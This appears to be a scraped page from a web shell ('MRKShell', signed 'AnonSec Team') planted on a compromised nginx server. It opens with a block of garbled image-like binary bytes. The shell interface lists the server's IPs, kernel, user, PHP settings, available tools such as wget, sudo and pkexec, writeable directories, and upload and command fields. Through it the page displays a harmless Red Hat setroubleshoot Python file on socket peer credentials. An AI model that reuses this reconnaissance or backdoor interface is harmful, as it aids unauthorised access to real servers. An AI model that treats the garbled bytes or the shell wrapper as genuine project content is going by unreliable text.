JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 104.21.73.244  /  Your IP : 104.23.243.235
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python3.6/site-packages/setroubleshoot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /usr/lib/python3.6/site-packages/setroubleshoot/access_control.py
# Authors: Karl MacMillan <kmacmillan@mentalrootkit.com>
#
# Copyright (C) 2006,2007,2008 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

"""Access control for setroubleshoot. For now this is only used for
determining which users are allowed to connect to the server: see
UserServerAccess for more information."""

import struct
import socket as Socket
import syslog

from setroubleshoot.config import get_config
from setroubleshoot.util import syslog_trace

__all__ = [
    'ServerAccess',
]


# SO_PEERCRED is not defined by the socket class unless patched
# SO_PEERCRED's value is architecture dependent
# alpha, mips:    18
# parisc:         0x4011
# powerpc:        21
# sparc, sparc64: 0x0040
# default:        17
try:
    SO_PEERCRED = Socket.SO_PEERCRED
except AttributeError:
    import os
    import re
    machine = os.uname()[4]
    if re.search(r'^i\d86', machine):
        SO_PEERCRED = 17     # i386,i486,i586,i686, etc.
    elif re.search(r'^x86_64', machine):
        SO_PEERCRED = 17     # x86_64
    elif re.search(r'^(ppc|powerpc)', machine):
        SO_PEERCRED = 21     # ppc
    elif re.search(r'^(alpha|mips)', machine):
        SO_PEERCRED = 18     # alpha, mips
    elif re.search(r'^sparc', machine):
        SO_PEERCRED = 0x0040  # sparc
    elif re.search(r'^parisc', machine):
        SO_PEERCRED = 0x4011  # parisc
    else:
        SO_PEERCRED = 17
    #print "hardcoding SO_PEERCRED=%s" % SO_PEERCRED


class ServerAccess:
    """
    Determine if a user should be given access to the server based
    on the configuration file.
    """

    privileges = {'client': {'wildcard': True},
                  'fix_cmd': {'wildcard': False},
                  }

    def __init__(self):
        # No attempt is made to validate the user name is valid. This
        # makes the configuration file more relaxed. Additionally, the
        # server (which we assume is the only user of this class) will
        # be getting uids from the kernel, so there shouldn't be access
        # requested from invalid uids

        self.privileges = {}
        for privilege in list(ServerAccess.privileges.keys()):
            self.privileges[privilege] = self.init_privilege(privilege)

    def init_privilege(self, privilege):
        cfg_names = [name.strip() for name in
                     get_config('access', '%s_users' % privilege).split(',')]
        return cfg_names

    def valid_privilege(self, privilege):
        valid = privilege in ServerAccess.privileges
        if valid:
            return True
        syslog.syslog(syslog.LOG_ERR, "unknown access privilege (%s)" % privilege)
        return False

    def unrestricted_privilege(self, privilege):
        if not self.valid_privilege(privilege):
            return False

        if not ServerAccess.privileges[privilege]['wildcard']:
            return False
        return '*' in self.privileges[privilege]

    def user_allowed(self, privilege, user):
        """
        Determine if the given user name is allowed access.
        Returns True if access should be given, False if not.
        """
        if not self.valid_privilege(privilege):
            return False

        if self.unrestricted_privilege(privilege):
            return True
        if user in self.privileges[privilege]:
            return True
        else:
            return False

    def uid_allowed(self, privilege, uid):
        """
        Determine if the given uid is allowed access. No error
        is returned if the uid is invalid (False is returned).
        Returns True if access should be given, False if not.
        """

        if not self.valid_privilege(privilege):
            return False

        if self.unrestricted_privilege(privilege):
            return True
        try:
            import pwd
            pwd_entry = pwd.getpwuid(uid)
        except KeyError:
            # Not a valid uid - so they don't get access. This
            # is not an error.
            return False

        return self.user_allowed(privilege, pwd_entry[0])

    def get_credentials(self, sock):
        """Obtain the effective user and group IDs of the process on
        the other end of a socket. SO_PEERCRED is used so the information
        returned is generally trustworthy (though root processes can
        impersonate any uid/gid)."""

        pid = uid = gid = None
        try:
            # socket attributes family,type,proto,timeout available only in Python >= 2.5
            family = sock.family
            if family != Socket.AF_UNIX:
                return uid, gid
        except AttributeError:
            # rely on pid,uid,gid being -1 if family is not AF_UNIX
            pass

        format_ucred = 'III'  # pid_t, uid_t, gid_t
        sizeof_ucred = struct.calcsize(format_ucred)

        try:
            ucred = sock.getsockopt(Socket.SOL_SOCKET, SO_PEERCRED, sizeof_ucred)
            pid, uid, gid = struct.unpack(format_ucred, ucred)
            if pid == -1:
                pid = None
            if uid == -1:
                uid = None
            if gid == -1:
                gid = None
        except Exception as e:
            pid = uid = gid = None
            import traceback
            syslog_trace(traceback.format_exc())
            syslog.syslog(syslog.LOG_ERR, "get_credentials(): %s" % e)

        return uid, gid

Anon7 - 2022
AnonSec Team